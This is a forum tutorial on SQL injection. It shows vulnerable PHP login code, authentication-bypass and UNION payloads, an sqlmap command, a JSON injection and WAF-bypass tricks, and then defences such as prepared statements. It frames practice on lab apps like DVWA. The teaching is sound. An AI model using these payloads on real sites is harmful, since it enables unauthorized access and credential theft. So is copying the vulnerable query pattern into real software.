Imagine that just one line in the login text field can bypass the entire authentication system and open access to the site's database. Sounds like a movie? It's real, and its name is SQL Injection.
Introduction
SQL Injection is one of the most dangerous and widespread vulnerabilities in web applications. Despite the fact that it has been talked about for more than 20 years, thousands of sites still remain vulnerable.
In this article we will discuss:
- How SQL injection works using a vulnerable web application as an example.
- Practical exploitation using Python and SQLmap.
- How to protect yourself from such attacks.
- Modern WAF bypass techniques and complex cases.
If you are a pentester or web developer, this material will help you gain a deeper understanding of attack and defense mechanisms.
How does SQL Injection work?
SQL injection occurs when an application improperly processes user input, allowing an attacker to inject arbitrary SQL code.
Example of vulnerable PHP code:
Code:
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
$result = mysqli_query($conn, $query);If you enter
Code:
admin' --
Code:
username
Code:
SELECT * FROM users WHERE username='admin' --' AND password='...'Comment
Code:
--SQL injection exploitation in practice
Let's consider a real case with a vulnerable site (we use a legal stand, for example, We;come DVWA - Damn Vulnerable Web Application or OWASP WebGoat | OWASP Foundation).
[h4]1. Installing DVWA (for beginners)[/h4]
[ol]
[*]Download DVWA from We;come DVWA - Damn Vulnerable Web Application.
[*]Install XAMPP or LAMP for local server.
[*]Place the DVWA files in the folder
Code:
htdocs[*]Set up the database in
Code:
config.inc.php[*]Start the server and open DVWA in your browser.
[/ol]
[h4]2. Vulnerability detection[/h4]
Let's check the login form for SQL injection:
- We enter
- if an SQL error appears, there is a vulnerability.Code:
' - Let's try
- if authorization passes, the injection is confirmed.Code:
' OR 1=1 --
[h4]3. Extracting data using UNION attack[/h4]
If your application outputs the results of a query, you can use UNION to retrieve data from other tables.
Example request:
Code:
' UNION SELECT username, password FROM users --The response may contain password hashes, which can then be cracked using John the Ripper password cracker or hashcat - advanced password recovery.
[h4]4. Automation with SQLmap[/h4]
To speed up testing we use SQLmap:
Code:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=123" --dbsExplanation of flags:
-
— Target URL.Code:
-u -
— POST request data.Code:
--data -
— extracting a list of databases.Code:
--dbs
[h4]5. Modern techniques: SQLi in REST API and WAF bypass[/h4]
SQLi in REST API
If the application uses JSON, the injection can be implemented in the request body:
Code:
{
"username": "admin' OR 1=1 --",
"password": "password"
}Bypass WAF
To bypass WAF you can use:
- Modification of keywords:
Code:SELSELECTECT * FROM users WHERE username='admin' - Cascading queries:
Code:'; SELECT * FROM users WHERE '1'='1
Recommended materials on SQL Injection on Codeby.net
[ol]
[*]CTF: Solving SQL Injection tasks
Practical analysis of SQLi tasks using SQLmap and manual techniques. Suitable for preparing for CTF and practicing skills on legal stands.
[*]SQL-injection, Error Based - XPATH
Understanding Injections Through Functions
Code:
extractvalue()
Code:
updatexml()[*]SQL Injection: Discussion and Questions
A forum thread discussing various SQL injection techniques, including Boolean-based and filter bypass, with query examples and tips from participants.
[/ol]
How to protect yourself from SQL Injection?
- Use Prepared Statements
Code:$stmt = $conn->prepare("SELECT * FROM users WHERE username=? AND password=?"); $stmt->bind_param("ss", $username, $password); $stmt->execute(); - Use ORM (e.g. SQLAlchemy, Django ORM)
ORMs automatically escape queries to prevent injections. - Restrict DB rights
The application should not have rights toorCode:DROP TABLE.Code:UNION SELECT - Use a WAF (eg ModSecurity)
WAF helps block known attack patterns. - Check your input data
Use whitelisting (allow only expected values).
SQL Injection remains a serious threat, but it can be avoided by following best practices. If you test your applications, be sure to check them for vulnerabilities, and if you develop, always use parameterized queries.
FAQ
How to test SQLi legally?Only on your own applications or through bug bounty (for example, on HackerOne).
What other types of SQL injections are there?Blind (Blind SQLi), Time-Based and Error-Based.
How to detect blind SQLi?Through conditional errors or response delays (e.g.
Code:
SLEEP(5)Django ORM, SQLAlchemy and Hibernate automatically escape queries.
Is it possible to protect yourself with just a WAF?No, WAF helps, but it does not replace secure code.
Try to repeat the attack on DVWA and share the results in the comments!
